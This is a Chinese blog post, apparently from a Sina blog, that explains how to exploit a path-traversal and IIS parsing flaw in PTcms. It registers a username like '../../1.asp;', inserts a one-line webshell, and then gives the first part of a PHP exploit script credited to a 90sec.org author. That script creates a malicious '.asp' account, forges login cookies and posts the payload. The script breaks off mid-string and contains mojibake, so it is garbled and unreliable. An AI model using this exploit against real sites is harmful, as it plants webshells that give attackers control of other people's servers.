于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,
那么我们注册../../1.asp; 或者../../2.asp
然后在书架或者收藏哪里插入一句话,
对应的木马地址是
http://localhost/1.asp;/mark.ptv
http://localhost/1.asp/mark.ptv
ps://针对解析漏洞的 鸡肋
下面放出落叶的exp 怕在下面大家看不到哈。
//error_reporting(0);
print_r(''
+---------------------------------------------------------------------------+
PTcms Code written Exploit
by:cfking@90sec.org
welcome to [url]www.90sec.org[/url]
+---------------------------------------------------------------------------+
''
);
if($argv[1]==null){
print_r(''
Usage: php ''.$argv[0].'' url
Example:
php ''.$argv[0].''
[url]www.site.com[/url]
'');
exit;
}
$url=$argv[1];
$user=substr(md5(time()),0,10).".asp";
$settime=date("Y-m-d",time());
$to=postzend($url,"username=$user&password=hacker&chk_password=hacker&dosubmit=��һ��");
if($to!==null){
postzend($url,"comeurl=http://www.cscity.net/user/index.php&username=$to&password=hacker&cookietime=31536000&dosubmit=��+��",''login'',''/user/logchk.php'');
$cookie="logtime=$settime; logip=110.110.110.110;
pt_userlv=����; pt_userpmnum=0; pt_username=$to";
postzend($url,''1=
分享:
喜欢
0
赠金笔
加载中,请稍候......
评论加载中,请稍候...
发评论
登录名: 密码: 找回密码 注册记住登录状态
昵 称:
发评论
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。